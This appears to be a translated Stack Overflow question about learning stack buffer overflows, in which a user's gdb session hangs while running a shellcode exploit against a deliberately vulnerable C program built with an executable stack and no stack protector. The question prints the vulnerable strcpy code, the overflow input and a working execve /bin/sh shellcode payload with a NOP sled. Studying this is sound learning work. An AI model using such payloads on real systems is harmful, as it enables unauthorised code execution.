尝试运行缓冲区溢出漏洞利用时,gdb卡住了

时间:2018-10-06 18:50:04

标签: c gdb buffer-overflow

我正在尝试学习缓冲区溢出,但是发现自己陷入了死胡同。当我想执行shellcode gdb时,只是卡住了,什么都不做(Ctrl-C,Ctrl-D,Enter,Esc),我必须关闭终端并再次运行所有命令。我有一个在Linux 64位上运行的易受攻击的程序:

int main(int argc, char **argv) {
    char buffer[256];
    if (argc != 2) {
        exit(0);
    }
    printf("%p\n", buffer);
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    return 0;
}

在gdb中:

$ gcc vuln.c -o vuln -g -z execstack -fno-stack-protector
$ sudo gdb -q vuln
(gdb) list
1   #include <stdio.h>
2   #include <string.h>
3   #include <stdlib.h>
4   
5   int main(int argc, char **argv) {
6       char buffer[256];
7       if (argc != 2) {
8           exit(0);
9       }
10      printf("%p\n", buffer);
(gdb) break 5
Breakpoint 1 at 0x4005de: file vuln.c, line 5.
(gdb) run $(python3 -c 'print("A" * 264 + "B" * 6)')
Starting program: /home/vladimir/workspace/hacking/vuln $(python3 -c 'print("A" * 264 + "B" * 6)')

Breakpoint 1, main (argc=2, argv=0x7fffffffe378) at vuln.c:7
7       if (argc != 2) {
(gdb) cont
Continuing.
0x7fffffffe190
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()
(gdb) i r
rax            0x0  0
rbx            0x0  0
rcx            0x7ffff7b01ef4   140737348902644
rdx            0x7ffff7dd28c0   140737351854272
rsi            0x602260 6300256
rdi            0x0  0
rbp            0x4141414141414141   0x4141414141414141
rsp            0x7fffffffe2a0   0x7fffffffe2a0
r8             0xfffffffffffffff0   -16
r9             0xffffffffffffff00   -256
r10            0x60236e 6300526
r11            0x246    582
r12            0x4004e0 4195552
r13            0x7fffffffe370   140737488348016
r14            0x0  0
r15            0x0  0
rip            0x424242424242   0x424242424242
(gdb) run $(python3 -c 'print("\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" + "\x90" * 233 + "\x90\xe1\xff\xff\xff\x7f")')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vladimir/workspace/hacking/vuln $(python3 -c 'print("\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05" + "\x90" * 233 + "\x90\xe1\xff\xff\xff\x7f")')

Breakpoint 1, main (argc=2, argv=0x7fffffffe288) at vuln.c:7
7       if (argc != 2) {
(gdb) cont
Continuing.
0x7fffffffe0a0

在地址之后,还会打印一些垃圾,并且说gdb卡住了。即使我在gdb的同一会话中运行程序,并使用这两个不同的输入,缓冲区的地址也会以某种方式发生变化,我无法想到为什么。谁能告诉我为什么gdb卡住了,为什么地址在更改?我在做什么错了?

2 个答案:

答案 0 :(得分:1)

每次运行编译的程序时,gdb都会调用链接程序为buffer分配一些空间。无法保证每次都会在同一空间中,并且gdb可能会故意将其放置在其他位置,以使不同的运行分开。

您在这里使用C程序正在执行的操作会导致错误,该错误会被操作系统捕获并清除。在导致简单的缓冲区溢出和能够使用它运行shell命令之间存在巨大的差距。您有代码可以完成第一部分,但是您需要更多的见识来完成第二部分。

如果您真的想做这种事情,那么您将需要做更多的阅读才能了解正在发生的事情以及您可能做的事情。

答案 1 :(得分:0)

地址更改,因为输入main时的堆栈指针取决于命令行参数的总长度。这两个python片段生成了不同长度的数据。

相关问题
最新问题